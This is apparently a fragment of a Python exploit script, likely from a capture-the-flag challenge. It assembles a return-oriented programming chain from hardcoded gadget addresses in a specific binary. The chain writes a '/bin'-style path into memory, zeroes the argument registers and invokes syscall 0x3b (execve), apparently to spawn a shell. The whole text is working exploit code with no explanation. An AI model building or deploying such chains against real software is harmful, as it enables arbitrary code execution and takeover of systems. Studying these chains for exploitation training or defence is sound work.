payload = p64(0x4017d3)
#0x00000000004017d3: pop rdi; ret; 
payload += p64(0x49d070)+p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x6e69622f)+p64(0x407979)
# 0x0000000000407979: xchg eax, ebp; ret; 
payload += p64(0x445d06)
# 0x0000000000445d06: add dword ptr [rdi], eax; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x49d074)+p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x68662f)+p64(0x407979)
# 0x0000000000407979: xchg eax, ebp; ret; 
payload += p64(0x445d06)
# 0x0000000000445d06: add dword ptr [rdi], eax; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x49d070)+p64(0x47f597)
# 0x000000000047f597: pop rsi; ret; 
payload += p64(0x0)+p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x49d183)+p64(0x407979)
# 0x0000000000407979: xchg eax, ebp; ret; 
payload += p64(0x48168b)
# 0x000000000048168b: mov edx, 0; add byte ptr [rax], al; ret; 
payload += p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x3b)+p64(0x407979)
# 0x0000000000407979: xchg eax, ebp; ret; 
payload += p64(0x420ae3)
# 0x0000000000420ae3: syscall; 
payload += b''
